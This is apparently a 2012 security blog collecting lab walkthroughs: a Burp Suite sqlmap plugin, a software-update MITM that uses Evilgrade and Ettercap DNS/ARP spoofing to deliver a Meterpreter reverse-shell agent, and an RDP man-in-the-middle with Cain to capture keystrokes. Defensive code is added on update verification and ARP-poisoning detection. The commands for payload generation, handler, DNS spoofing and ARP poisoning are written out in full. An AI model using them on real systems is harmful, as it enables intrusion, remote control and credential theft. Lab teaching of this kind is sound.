Thursday, September 6, 2012

MySQLDumper Exploit

------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Wednesday, September 5, 2012

Sqlmap plugin for BurpSuite

Download the SQLmap plugin for Burp Suite at: http://code.google.com/p/gason/downloads/list
1 - Store it in the same folder as Burp Suite
2 - Use this command to start Burp Suite with the plugin (on Linux):
java -classpath gason-0.9.5.jar:"burpsuite_v1.4.01.jar" burp.StartBurp
3 - On start, when you click the Proxy tab / action, you will see "send to sqlmap"

Configure your web browser to use the Burp Suite proxy. Now you can use it:

1 - Send a request from the browser through Burp Suite
2 - Action / Send to SQLmap

In the SQLmap options, you must:
1 - Configure the SQLmap bin path
2 - Choose the action
3 - Set options if you need them, then run

And this is the result:

Sunday, September 2, 2012

Software Update MITM Exploit using Evilgrade and Ettercap

Many programs check for updates; sometimes updates are performed over SSL, but commonly they are delivered over HTTP, which can be manipulated.
Evilgrade is a modular exploit tool that spoofs software update responses to deliver an executable of your choosing to the victim. In this lab, I used Evilgrade with Ettercap.

Your victim machine runs an unstable Notepad++ version:
1 - Note the unstable version
2 - Note the victim IP and DNS
Install Evilgrade on the BackTrack system:
1 - # cd /root
2 - # apt-get install libdata-dump-perl
3 - # wget http://isr-evilgrade.googlecode.com/files/isr-evilgrade-2.0.0.tar.gz
4 - # tar xfz isr-evilgrade-2.0.0.tar.gz
5 - # cd isr-evilgrade
Prepare the Meterpreter executable to deliver to the victim:
1 - # ifconfig eth0
Get your BackTrack IP address
2 - # cd /root/isr-evilgrade/agent/
Go to the Evilgrade agent directory
3 - # /opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.174.132 LPORT=8080 X > agent.exe
Create the Meterpreter executable
4 - # ls
Verify agent.exe

1 - # /opt/metasploit/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=8080 LHOST=0.0.0.0 E
Start the Meterpreter handler to accept the reverse TCP connection
2 - Leave this command running while we continue the lab

1 - # echo "notepad-plus.sourceforge.net A 192.168.174.132" >> /usr/local/share/ettercap/etter.dns
Add an entry to etter.dns to resolve notepad-plus.sourceforge.net
2 - # echo "download.tuxfamily.org A 192.168.174.132" >> /usr/local/share/ettercap/etter.dns
Add an entry to etter.dns to resolve download.tuxfamily.org
3 - # gedit /usr/local/share/ettercap/etter.dns
Check your config

Launch Ettercap with the ARP MITM attack:
1 - # ettercap -Tqm arp:remote /192.168.174.150/ /8.8.8.8,4/
2 - Press "p" to choose a plugin
3 - Invoke the dns_spoof Ettercap plugin
4 - Test on the victim system

Invoke the Evilgrade Notepad++ module:
1 - # cd /root/isr-evilgrade
2 - # ./evilgrade
3 - evilgrade> conf notepadplus
4 - evilgrade(notepadplus)> start

Note: If your Notepad++ version is higher than 5.8, you must edit the Notepad++ module config file:
1 - # gedit /root/isr-evilgrade/modules/notepadplus.pm
2 - Change 'vh' => 'notepad-plus.sourceforge.net' to 'vh' => 'download.tuxfamily.org'

On the victim system:
1 - Run Notepad++, click ? | Update Notepad++
2 - After downloading the update executable, Notepad++ prompts the user to install the update. Click "Yes"

Return to Meterpreter on the BackTrack system.
From here you have control over the victim system; try entering Meterpreter commands:
1 - sysinfo
2 - shell
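The lab works because the client trusts whatever the spoofed DNS name serves over plain HTTP. As an added example (not Evilgrade's, Notepad++'s or the post author's code), here is the pair of checks an updater needs to resist it: authenticated transport and a pinned-hash check on the downloaded payload. The one-line "version|url|sha256" manifest format, the host updates.example.invalid and all sample bytes are assumptions constructed for the demo.

```python
"""Added example (not Evilgrade's, Notepad++'s or the post author's code): the two
checks that defeat the update spoofing above, authenticated transport and payload
verification. The 'version|url|sha256' manifest is hypothetical, data constructed."""
import hashlib
import hmac
import ssl
import urllib.request
from urllib.parse import urlparse

def sha256_hex(blob):
    return hashlib.sha256(blob).hexdigest()

def parse_manifest(text):
    """Hypothetical one-line manifest: version|download url|sha256 hex."""
    version, url, digest = text.strip().split("|")
    return {"version": version, "url": url, "sha256": digest.lower()}

def transport_is_acceptable(url):
    """Plain HTTP is exactly what dns_spoof plus Evilgrade hijacks: the client
    never authenticates the server, so the response can be anything."""
    p = urlparse(url)
    return p.scheme == "https" and bool(p.hostname)

def payload_is_genuine(blob, expected_sha256):
    """Pinned-hash check. The hash must itself come from an authenticated
    manifest, or the attacker rewrites manifest and payload together."""
    return hmac.compare_digest(sha256_hex(blob), expected_sha256.lower())

def fetch_update(url, timeout=30):
    """Download with chain and hostname validation; refuses http:// outright."""
    if not transport_is_acceptable(url):
        raise ValueError(f"refusing insecure update URL: {url}")
    ctx = ssl.create_default_context()
    with urllib.request.urlopen(url, context=ctx, timeout=timeout) as resp:
        return resp.read()

def decide(manifest_text, downloaded):
    m = parse_manifest(manifest_text)
    if not transport_is_acceptable(m["url"]):
        return "rejected: insecure transport"
    if not payload_is_genuine(downloaded, m["sha256"]):
        return "rejected: hash mismatch"
    return f"ok: install {m['version']}"

if __name__ == "__main__":
    genuine = b"constructed installer bytes"
    good = "5.9|https://updates.example.invalid/npp.exe|" + sha256_hex(genuine)
    print(decide(good, genuine))
    print(decide(good, b"substituted agent.exe bytes"))
```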


Saturday, September 1, 2012

RDP Man in The Middle

Remote Desktop Protocol (RDP) is used in most Windows environments. It is often vulnerable to man-in-the-middle attacks: you can decrypt the session to reveal keystrokes. Today, we will demo this.
Note: Newer RDP versions can employ a certificate and TLS encryption, but self-signed certs are often used, and Cain is the only tool we know of that can attack RDP (even with TLS).
We need three systems:
•    RDP server
•    RDP client (victim)
•    Attacker (running Cain on Windows XP)
Note:
•    No security suite (disable the firewall)
•    Note the IP address of each
•    Install Cain & Abel, and accept all defaults except WinPcap
1.    On the RDP server system, create an admin user account:
1 - Create an administrator account
2 - Then add it to the Administrators group
3 - Verify its creation
2.    Enable RDP on the RDP server system:
1 - Right-click My Computer
2 - Choose Properties
3 - Choose the Remote tab
4 - Check “Allow users to connect remotely to this computer”. Click OK on the confirmation dialog
5 - Click “Apply”
6 - Click “OK”
3.    RDP MitM on the attacker system:
1 - Press the Sniffer button
2 - Select the Sniffer tab
3 - Select the Hosts tab
4 - Press the blue + sign
5 - Select the Range radio button
6 - Enter the target IP range
7 - Press OK to perform an ARP scan
Here we see the hosts on the network at this time. Verify that the client and server are listed here.
We will select the victim client and server to poison:
1 - Select the APR tab
2 - Press the blue + sign
3 - Select your target
4 - Press OK
When you are ready, press the radioactive symbol button (1) to initiate ARP cache poisoning.
4.    The victim connects to the RDP server:
1 - Run mstsc to start the Remote Desktop client
2 - Enter the RDP server IP, click Connect and enter the username and password when prompted
5.    On the attacker system:
1 - Click on APR-RDP to see the session(s)
2 - Right-click on the filename and choose View to open the decrypted file in Notepad
1 - Select Find from the Edit menu in Notepad
2 - Enter “key pressed” as the search term
3 - Press Find Next to move through the decrypted keystrokes
6.    Clean up
Remove the test account from the RDP server
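Both this lab and the Evilgrade one above only work because the victim's ARP cache is poisoned (Cain's APR here, Ettercap's arp:remote there). As an added example that is not part of the original posts, the snippet below diffs two Windows arp -a snapshots from the victim and flags the two tell-tale signs: a gateway or server IP whose MAC changed, and one MAC answering for several IPs. The MACs, the RDP server address 192.168.174.140 and both snapshots are constructed; only the victim IP 192.168.174.150 comes from the post.

```python
"""Added example (not from the original post): detect ARP cache poisoning of the
kind Ettercap's arp:remote and Cain's APR perform, by diffing two Windows
`arp -a` snapshots taken on the victim. All addresses are constructed."""
import re
from collections import defaultdict

# One `arp -a` row: IP, MAC (dash- or colon-separated), entry type.
ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)")

def parse_arp_table(text):
    """{ip: mac} for dynamic rows only; static/multicast rows cannot be poisoned."""
    table = {}
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table

def find_poisoning(baseline, current, watched_ips):
    """Two signals: a watched IP (gateway, RDP server) whose MAC flipped since
    the baseline, and a single MAC now answering for several IPs."""
    alerts = []
    for ip in watched_ips:
        old, new = baseline.get(ip), current.get(ip)
        if old and new and old != new:
            alerts.append(f"{ip}: MAC changed {old} -> {new}")
    ips_by_mac = defaultdict(list)
    for ip, mac in current.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} answers for {sorted(ips)}")
    return alerts

# Constructed snapshots: before and after an attacker at 00:0c:29:11:22:33
# poisons the victim's entries for the gateway and the RDP server.
BEFORE = """Interface: 192.168.174.150 --- 0xb
  Internet Address      Physical Address      Type
  192.168.174.1         00-50-56-c0-00-08     dynamic
  192.168.174.140       00-0c-29-aa-bb-cc     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""
AFTER = (BEFORE.replace("00-50-56-c0-00-08", "00-0c-29-11-22-33")
               .replace("00-0c-29-aa-bb-cc", "00-0c-29-11-22-33"))

def demo():
    return find_poisoning(parse_arp_table(BEFORE), parse_arp_table(AFTER), ["192.168.174.1", "192.168.174.140"])
```

Run demo() on the constructed snapshots and it returns three alerts; an empty list from a snapshot diffed against itself is the healthy case.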

Install Xposed Inspector and Frida on Genymotion

Today I had some work with Android, so I needed to trace an application. I found 2 nice tools that can help me: Xposed Inspector and Frida. To setup ther...